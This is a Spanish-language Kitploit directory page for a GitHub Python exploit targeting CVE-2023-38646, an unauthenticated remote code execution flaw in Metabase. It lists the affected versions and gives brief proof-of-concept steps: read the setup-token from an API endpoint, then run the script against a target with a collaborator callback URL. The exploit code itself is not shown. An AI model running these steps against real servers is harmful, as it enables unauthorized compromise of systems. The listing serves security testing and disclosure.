Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-38646 — Exploit en Python para la ejecución remota de código previa a la autenticación en Metabase (CVE-2023-38646) con extracción de setup-token y callback de collaborator para el compromiso del servidor sin autenticación. | Kitploit
Herramientas/GitHubGitHub/kh4sh3i/cve-2023-38646
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubkh4sh3i/cve-2023-38646

CVE-2023-38646

Exploit en Python para la ejecución remota de código previa a la autenticación en Metabase (CVE-2023-38646) con extracción de setup-token y callback de collaborator para el compromiso del servidor sin autenticación.

Ver Repositorio
91hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir



Metabase

Metabase es una herramienta de inteligencia empresarial de código abierto que te permite crear gráficos y paneles utilizando datos de una variedad de bases de datos y fuentes de datos. Es un proyecto popular, con más de 33k estrellas en GitHub y ha recibido bastante escrutinio desde una perspectiva de investigación de vulnerabilidades en los últimos años.

CVE-2023-38646 - RCE sin autenticación en Metabase

Metabase open source anterior a 0.46.6.1 y Metabase Enterprise anterior a 1.46.6.1 permiten a atacantes ejecutar comandos arbitrarios en el servidor, al nivel de privilegio del servidor. No se requiere autenticación para la explotación. Las otras versiones corregidas son 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 y 1.43.7.2.

Pasos del PoC

root@kitploit:~
* go to : http://target.com/api/session/properties
* copy : setup-token
* get collaborator url
root@kitploit:~
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>

Versión vulnerable

root@kitploit:~
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2

referencias

  • assetnote
Descargar herramienta